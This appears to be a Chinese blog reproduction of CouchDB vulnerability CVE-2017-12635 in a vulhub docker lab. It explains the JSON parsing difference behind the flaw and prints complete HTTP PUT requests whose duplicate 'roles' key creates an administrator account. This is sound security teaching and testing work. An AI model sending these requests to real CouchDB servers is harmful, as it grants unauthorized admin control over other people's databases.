首页 > 其他分享 >Couchdb 垂直权限绕过漏洞(CVE-2017-12635)

Couchdb 垂直权限绕过漏洞(CVE-2017-12635)

时间:2022-11-08 14:45:16浏览次数:79  
标签:vulhub roles Couchdb 5984 12635 2017 CVE

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

影响版本:小于 1.7.0 以及 小于 2.1.1

参考链接:

测试环境

编译及启动环境:

docker-compose build
docker-compose up -d

环境启动后,访问http://your-ip:5984/_utils/即可看到一个web页面,说明Couchdb已成功启动。但我们不知道密码,无法登陆。

漏洞复现

首先,发送如下数据包:

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

可见,返回403错误:{"error":"forbidden","reason":"Only _admin may set roles"},只有管理员才能设置Role角色:

发送包含两个roles的数据包,即可绕过限制:

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}
 

 

 

成功创建管理员,账户密码均为vulhub

再次访问http://your-ip:5984/_utils/,输入账户密码vulhub,可以成功登录:

 

 

 

标签:vulhub,roles,Couchdb,5984,12635,2017,CVE
From: https://www.cnblogs.com/lyh1/p/16869669.html

相关文章

  • Nacos 认证绕过漏洞(CVE-2021-29441)
    Nacos认证绕过漏洞(CVE-2021-29441)产生原因:1.认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。2.开发者原意是用来处理一些服......
  • CVE-2021-44228log4j2RCE
    环境:jdk1.8.0_121,win11.log4j2.14.01.idea新建springbootweb项目并引入依赖idea安装:1.微信公众号软件管家。2.自行百度新建springbootweb项目。自行百度引入如下......
  • 【Azure 环境】Azure 云环境对于OpenSSL 3.x 的严重漏洞(CVE-2022-3602 和 CVE-2022-3
    问题描述引用报告:(OpenSSL3.x曝出严重漏洞: ​​​https://www.ctocio.com/ccnews/37529.html​​ )最近OpenSSL3.x爆出了严重安全漏洞,分别是 CVE-2022-3602和 CVE-202......
  • 【Azure 环境】Azure 云环境对于OpenSSL 3.x 的严重漏洞(CVE-2022-3602 和 CVE-2022-3
    问题描述引用报告:(OpenSSL3.x曝出严重漏洞:https://www.ctocio.com/ccnews/37529.html )最近OpenSSL3.x爆出了严重安全漏洞,分别是 CVE-2022-3602和 CVE-2022-3786.......
  • 【漏洞学习及复现】Log4j2(CVE-2021-44228)漏洞复现
    Log4j2漏洞(CVE-2021-44228)Log4j2ApacheLog4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开......
  • Nexus RCE CVE-2018-16621/CVE-2020-10204
    POST/service/extdirectHTTP/1.1Host:xxxxxxxxxUser-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:106.0)Gecko/20100101Firefox/106.0Accept:*/*Accep......
  • APACHE_CVE-2021-40438-SSRF漏洞分析复现
    影响版本v2.4.48及以下版本该版本中mod_proxy模块存在一处逻辑错误,导致攻击者可以控制反向代理服务器的地址,进而导致SSRF漏洞。该漏洞影响范围较广,危害较大,利用简单,目前......
  • IfcVectorOrDirection
    IfcVectorOrDirection类型定义IfcVectorOrDirection允许在矢量函数的IfcVent和IfcDirection之间进行选择。 注:定义符合ISO/CD10303-42:1992此类型用于标识可以参与......
  • Apache Shiro 认证绕过漏洞【CVE-2020-1957】
    ApacheShiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到......
  • Log4j2远程命令执行【CVE-2021-44228】
    Log4j2远程命令执行【CVE-2021-44228】参考:ApacheLog4j2CVE-2021-44228漏洞复现分析影响范围:ApacheLog4j22.0.0~2.15.0-rc1目前为止已知如下组件存在漏洞Spri......